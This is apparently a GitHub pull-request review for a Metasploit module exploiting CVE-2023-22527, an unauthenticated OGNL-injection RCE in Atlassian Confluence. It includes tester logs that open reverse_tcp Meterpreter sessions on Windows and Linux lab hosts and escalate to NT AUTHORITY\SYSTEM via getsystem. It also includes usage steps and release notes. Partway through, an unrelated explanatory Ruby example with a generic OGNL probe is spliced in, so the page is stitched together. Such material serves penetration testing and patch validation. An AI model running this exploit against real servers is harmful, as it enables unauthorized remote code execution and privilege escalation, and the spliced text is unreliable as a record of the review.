Add exploit for CVE-2023-22527 (Confluence RCE) #18734
modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22527.rb
```ruby
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
```
Can the tester keep an eye out for stability when running this multiple times?
Great module @zeroSteiner, one minor suggestion. Testing was as expected on both Unix and Windows. I reran the module on each OS a couple of times and the stability seemed fine to me.
Windows Command

```
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set target 1
target => 1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
payload => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (200774 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:49939) at 2024-01-25 12:57:40 -0500
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : WIN-2EEL7BRDUD8
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Unix Command

```
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set target 0
target => 0
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (24772 bytes) to 172.16.199.1
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:63558) at 2024-01-25 13:27:28 -0500
meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer        : 6bb0a19104ea
OS              : Linux 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec 6 17:14:50 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```
```ruby
      end

      unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
        fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
```
I hastily ran the module without switching to the appropriate target and appreciated the detail in this error message.
```
[-] Exploit aborted due to failure: no-target: The target platform 'Windows Server 2022' is incompatible with 'Unix Command'
```
```ruby
  def check
    confluence_version = get_confluence_version
    return CheckCode::Unknown unless confluence_version
```
Suggested change (original line, then proposed replacement):

```ruby
return CheckCode::Unknown unless confluence_version
return CheckCode::Unknown('Unable to determine the confluence version') unless confluence_version
```
Testing the
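The two decisions discussed in the review threads above, the platform gate that refuses an incompatible target and a `check` that returns `Unknown` with a reason when the version cannot be read, modelled stand-alone in Ruby. This is an added example, not code from the module or from the Metasploit project: the `CheckCode` struct, `NoTargetError`, the `TARGETS` table and the `ajs-version-number` meta tag lookup are assumptions made so it runs without the framework, and the sample HTML and probe/response strings are constructed. It also shows the generic shape of an evaluation probe (random operands wrapped in a random marker, then look for the computed product in the response) that template-injection checks use in general; the request that reaches the vulnerable Confluence endpoint is deliberately not reproduced.

```ruby
# Added example, not the module's code. Models two decisions from the review:
# (1) check() returning Unknown with a reason when the version is unknown,
# (2) the platform gate that refuses an incompatible target.
# ASSUMPTION: Metasploit's CheckCode and fail_with are stood in for by a
# Struct and a plain exception so this file runs without the framework.

CheckCode = Struct.new(:code, :reason) do
  def to_s
    reason ? "#{code}: #{reason}" : code.to_s
  end
end

class NoTargetError < StandardError; end

# ASSUMPTION: the version is read from an "ajs-version-number" <meta> tag;
# the real module's get_confluence_version is not reproduced here.
VERSION_META = /<meta\s+name="ajs-version-number"\s+content="([^"]+)"/i

def get_confluence_version(html)
  m = VERSION_META.match(html)
  m && m[1]
end

# Reviewer's point: an Unknown result should carry the reason so the operator
# can tell "could not fingerprint" apart from "fingerprinted, not vulnerable".
# Whether a given version is vulnerable is not decided here; Detected only
# reports that a Confluence version string was found.
def check(html)
  version = get_confluence_version(html)
  return CheckCode.new(:Unknown, 'Unable to determine the confluence version') unless version

  CheckCode.new(:Detected, "Confluence version #{version}")
end

# Target table shaped like the module's two targets (names from the demo output).
TARGETS = [
  { name: 'Unix Command', platform: 'unix' },
  { name: 'Windows Command', platform: 'win' }
].freeze

# Same predicate as the module's gate: the detected platform is Windows iff
# the selected target is the Windows one.
def platform_compatible?(confluence_platform, target)
  confluence_platform.downcase.start_with?('win') == (target[:platform] == 'win')
end

# Stand-in for fail_with(Failure::NoTarget, ...), with the same message text
# that the review comment above shows the module emitting.
def select_target!(confluence_platform, target)
  return target if platform_compatible?(confluence_platform, target)

  raise NoTargetError,
        "The target platform '#{confluence_platform}' is incompatible with '#{target[:name]}'"
end

# Generic template-injection evaluation probe: two random operands wrapped in a
# random marker. A response containing marker+product+marker proves the
# expression was evaluated server-side; the literal expression coming back
# means it was merely reflected. How the expression is embedded in the
# request is injection-point specific and is not shown here.
def ognl_probe(rng: Random.new)
  a = rng.rand(1000..9999)
  b = rng.rand(1000..9999)
  marker = rng.bytes(4).unpack1('H*')
  {
    expression: "#{marker}#{a}*#{b}#{marker}",
    expected: "#{marker}#{a * b}#{marker}"
  }
end

def ognl_evaluated?(response_body, probe)
  response_body.include?(probe[:expected]) && !response_body.include?(probe[:expression])
end

# Constructed sample response used only for the demo below.
SAMPLE_HTML = <<~HTML
  <html><head><meta name="ajs-version-number" content="8.5.3"></head></html>
HTML

if __FILE__ == $PROGRAM_NAME
  puts check(SAMPLE_HTML)     # Detected: Confluence version 8.5.3
  puts check('<html></html>') # Unknown: Unable to determine the confluence version
  begin
    select_target!('Windows Server 2022', TARGETS[0])
  rescue NoTargetError => e
    puts "[-] no-target: #{e.message}"
  end
  probe = ognl_probe
  puts ognl_evaluated?("<p>#{probe[:expected]}</p>", probe) # true
end
```

Keeping the reason string on the `Unknown` path is what makes the `AutoCheck` output actionable: an operator who sees "Unable to determine the confluence version" knows to look at the fingerprinting step rather than assume the host is patched.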
Release Notes

This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account. On Windows the service account is NT AUTHORITY\NETWORK SERVICE which can be trivially escalated to NT AUTHORITY\SYSTEM using the RPCSS named pipe impersonation technique added in #14030 (`getsystem -t 4`).

Closes #18731
Verification

- `use exploit/multi/http/atlassian_confluence_rce_cve_2023_22527`
- Set `RHOSTS`, `PAYLOAD` and payload-related options

Demo